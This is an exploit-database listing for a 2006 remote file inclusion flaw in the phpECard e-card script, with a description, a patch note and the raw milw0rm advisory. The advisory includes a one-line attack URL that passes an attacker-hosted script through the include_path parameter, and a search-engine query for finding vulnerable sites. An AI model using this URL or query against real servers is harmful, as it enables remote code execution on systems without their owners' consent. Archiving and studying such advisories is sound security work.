header-logo
Suggest Exploit
vendor:
phpECard
by:
LeAk
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: phpECard
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpECard (functions.php) Remote File Inclusion Exploit

A remote file inclusion vulnerability exists in phpECard, which is a web-based e-card system. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which includes a URL in the include_path parameter of the functions.php script. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of phpECard.
Source

Exploit-DB raw data:

#==============================================================================================
# phpECard (functions.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.quick-xs.net/phpecard/
#          
#Google Search: powered by: phpecard                                                                                                                          
#                                                             
#================================================================================================
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================================
#Discoverd By : LeAk
#
#Conatact : Escape_LeAk[at]yahoo.com
#
# Turkis Hackers
==================================================================================================

# milw0rm.com [2006-08-29]